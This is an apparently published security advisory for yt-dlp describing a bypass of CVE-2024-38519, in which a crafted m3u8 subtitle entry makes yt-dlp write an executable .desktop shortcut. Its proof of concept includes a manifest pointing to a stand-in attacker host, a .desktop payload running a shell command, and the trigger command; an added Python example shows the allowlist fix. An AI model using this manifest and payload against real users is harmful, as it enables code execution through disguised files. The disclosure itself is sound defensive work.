yt-dlp: Dangerous file type creation via insufficient filename sanitization (Bypass of CVE-2024-38519)

Description

Summary

A vulnerability exists in yt-dlp that allows a remote attacker to write arbitrary OS-shortcut files (such as .desktop, .url, .webloc) to the user's filesystem, bypassing the remediation for CVE-2024-38519.

Details

The fix for CVE-2024-38519 enforced an allowlist for file extensions, in order to prevent writing files with unsafe extensions (such as .exe or .sh) during file downloads. However, this allowlist explicitly included the unsafe extensions .desktop, .url, and .webloc so that the functionality of the --write-link option (and its variants) could be preserved. These allowlist inclusions can be exploited by an attacker to write malicious OS-shortcut files in the context of a media or subtitles download.

Numerous yt-dlp extractors derive the downloaded media or subtitles file extension from a potentially attacker-controlled source. An attacker could craft an m3u8 file that contains an EXT-X-MEDIA:TYPE=SUBTITLES tag with a malicious URI (e.g., URI="http://attacker/x.desktop"), which would result in yt-dlp writing the attacker-controlled content to a file with a .desktop extension if the user had passed the --write-subs option.

Writing OS-shortcut files next to downloaded videos provides a high-probability social engineering vector. The extension of the shortcut file is often hidden from the user, e.g. on Windows by default or on many Linux desktop environments.

While these shortcut files are typically used to point to web locations via URLs, they can also contain shell commands or point to remote executables. The user may be deceived into opening the malicious shortcut disguised as a "subtitles"/media file, leading to a phishing attack or arbitrary code execution.

Proof of Concept

1. Start a malicious server:
Host a malicious master.m3u8 manifest that points to malicious subtitle payloads:

#EXTM3U
#EXT-X-MEDIA:TYPE=SUBTITLES,GROUP-ID="subs",NAME="English",URI="http://attacker/payload.desktop",LANGUAGE="en"

And host the payload.desktop file with malicious content:

[Desktop Entry]
Type=Application
Exec=sh -c "touch /tmp/ytdlp_pwned_$(id -u)"
Name=Subtitle

2. Trigger the download:
In this case, the generic extractor triggers the exploit if the --write-subs option is used:

yt-dlp --write-subs -o "MyVideo.%(ext)s" "http://attacker/master.m3u8"

Result: yt-dlp writes MyVideo.en.desktop to disk, containing the attacker payload.

Patches

yt-dlp version 2026.06.09 fixes this issue by removing .url, .desktop and .webloc from the global file extension allowlist, and by only allowing those file types to be written from within the context of the --write-link options' functionality.
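The two checks described above, the global allowlist that carried the shortcut types and the split that confines them to the --write-link context, shown as an added Python example that is not yt-dlp's own code. The allowlist contents, the WriteContext names and the manifest-audit helper are assumptions; the sample manifest is constructed from the advisory's own EXT-X-MEDIA line so the pre-fix and post-fix outcomes for the Details section's subtitle case can be compared directly.

```python
# Added example (not yt-dlp's code): a context-aware extension allowlist of the
# kind the patch description implies, plus an audit of a subtitle manifest.
# Allowlist contents, WriteContext names and helper signatures are assumptions.
import os
import re
from enum import Enum
from urllib.parse import urlparse


class WriteContext(Enum):
    MEDIA = "media"            # video/audio download
    SUBTITLES = "subtitles"    # --write-subs, --write-auto-subs
    THUMBNAIL = "thumbnail"    # --write-thumbnail, --write-all-thumbnails
    LINK = "link"              # --write-link and its variants


# Assumed allowlists; the real yt-dlp lists are longer.
MEDIA_EXTS = {"mp4", "mkv", "webm", "m4a", "mp3", "opus", "flac", "ogg", "ts", "mov"}
SUBTITLE_EXTS = {"srt", "vtt", "ass", "ttml", "json3"}
THUMBNAIL_EXTS = {"jpg", "jpeg", "png", "webp", "gif"}
# OS-shortcut types named in the advisory.
SHORTCUT_EXTS = {"url", "desktop", "webloc"}

# Shape of the check after CVE-2024-38519 and before this fix: one global
# allowlist that also carried the shortcut types, regardless of context.
GLOBAL_ALLOWLIST_BEFORE = MEDIA_EXTS | SUBTITLE_EXTS | THUMBNAIL_EXTS | SHORTCUT_EXTS
# Shape after the fix: shortcut types removed from the global list.
GLOBAL_ALLOWLIST_AFTER = MEDIA_EXTS | SUBTITLE_EXTS | THUMBNAIL_EXTS


def ext_from_uri(uri: str) -> str:
    """Derive a file extension from a URI path, as an extractor might do with
    an attacker-controlled manifest entry (query string and fragment ignored)."""
    path = urlparse(uri).path
    return os.path.splitext(path)[1].lstrip(".").lower()


def is_safe_ext_before(ext: str, context: WriteContext) -> bool:
    """Pre-fix check: context is ignored, so a subtitle may be written as .desktop."""
    return ext in GLOBAL_ALLOWLIST_BEFORE


def is_safe_ext_after(ext: str, context: WriteContext) -> bool:
    """Post-fix check: shortcut extensions are accepted only when writing a link
    file at the user's explicit request; every other context uses the reduced list."""
    if context is WriteContext.LINK:
        return ext in SHORTCUT_EXTS
    return ext in GLOBAL_ALLOWLIST_AFTER


# Matches an EXT-X-MEDIA line of TYPE=SUBTITLES and captures its URI attribute.
_SUBS_LINE = re.compile(r'^#EXT-X-MEDIA:(?=.*TYPE=SUBTITLES).*?URI="([^"]*)"', re.MULTILINE)


def subtitle_uris(manifest: str) -> list:
    """Return the URI of every EXT-X-MEDIA entry of TYPE=SUBTITLES, in order."""
    return _SUBS_LINE.findall(manifest)


def audit_manifest(manifest: str) -> list:
    """For each subtitle URI: (uri, derived ext, allowed pre-fix, allowed post-fix)."""
    rows = []
    for uri in subtitle_uris(manifest):
        ext = ext_from_uri(uri)
        rows.append((uri, ext,
                     is_safe_ext_before(ext, WriteContext.SUBTITLES),
                     is_safe_ext_after(ext, WriteContext.SUBTITLES)))
    return rows


# Constructed manifest: the advisory's subtitle line plus a benign .vtt track
# and an audio rendition that the subtitle audit must ignore.
SAMPLE_MANIFEST = """#EXTM3U
#EXT-X-MEDIA:TYPE=SUBTITLES,GROUP-ID="subs",NAME="English",URI="http://attacker/payload.desktop",LANGUAGE="en"
#EXT-X-MEDIA:TYPE=SUBTITLES,GROUP-ID="subs",NAME="German",URI="http://attacker/de.vtt",LANGUAGE="de"
#EXT-X-MEDIA:TYPE=AUDIO,GROUP-ID="aud",NAME="Main",URI="http://attacker/audio.m3u8"
"""

if __name__ == "__main__":
    for uri, ext, before, after in audit_manifest(SAMPLE_MANIFEST):
        print(f"{uri}: ext={ext!r} pre-fix allowed={before} post-fix allowed={after}")
```

Running the block reports the .desktop subtitle as allowed by the pre-fix check and rejected by the post-fix check, while the .vtt track passes both; the same post-fix function still accepts .desktop when the context is WriteContext.LINK, which is the behaviour the patch description preserves for --write-link.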

Workarounds

It is recommended to upgrade yt-dlp to version 2026.06.09 as soon as possible.

Users who are not able to upgrade should do ALL of the following:

  • Only pass fully trusted input URLs to yt-dlp
  • Do not use the --write-subs, --write-auto-subs, --embed-subs, --write-thumbnail, --write-all-thumbnails, or --embed-thumbnail options
  • Use --format - to interactively select download formats and validate their file extensions

Basic information

Type: reviewed
Severity: high
Published (advisory): 2026-06-16 20:59:42 UTC
Updated: 2026-06-16 20:59:44 UTC
GitHub reviewed: 2026-06-16 20:59:42 UTC

EPSS Score

Score: 0.12%
Percentile: 30.40%

CVSS Scores

Base score: 8.3
Version: 3.1
Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H
Attack vector (AV:N)
Could be attacked over the internet or any normal routed network—not just someone sitting at the machine.
Attack complexity (AC:H)
Even with access, the exploit needs extra luck, timing, or a fussy environment to actually work.
Privileges required (PR:N)
No account or special rights needed—anonymous or random user is enough.
User interaction (UI:R)
A real person has to do something—click, install, enable—otherwise it doesn’t land.
Scope (S:C)
Breaking this can reach past the original component and bite other resources—bigger blast radius.
Confidentiality (C:H)
Serious risk that confidential data gets exposed in a big way.
Integrity (I:H)
They could widely tamper with or forge data—trust in the data is badly hurt.
Availability (A:H)
Could take the service down hard or make it unusable for people who depend on it.

Identifiers

CWEs

CWE-641: Improper Restriction of Names for Files and Other Resources

Credits

  • pavanchow (reporter)
  • Grub4K (remediation developer)
  • bashonly (remediation reviewer)

Affected packages (1)

Vulnerable version ranges and first patched releases as published by GitHub.

Ecosystem: pip
Package: yt-dlp
Vulnerable range: < 2026.06.09
First patched: 2026.6.9
